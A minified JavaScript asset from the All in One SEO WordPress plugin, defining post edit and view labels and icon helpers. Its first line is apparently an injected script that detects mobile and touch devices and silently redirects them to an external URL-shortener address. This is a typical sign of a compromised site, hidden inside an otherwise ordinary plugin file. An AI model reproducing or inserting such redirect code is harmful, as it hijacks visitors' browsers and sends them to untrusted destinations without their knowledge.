(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import"./app-core.c8323d51.js";import{a as r,_ as n}from"./vendor-other.39e59221.js";const s="all-in-one-seo-pack",l=()=>({editPost:t=>r(n("Edit %1$s",s),t||n("Post",s)),getPostIconClass:t=>{const o="dashicons-admin-post";return t?.startsWith("dashicons-awb-")||t?.includes("data:image/svg+xml;base64")?o:t||o},viewPost:t=>r(n("View %1$s",s),t||n("Post",s))});export{l as u};
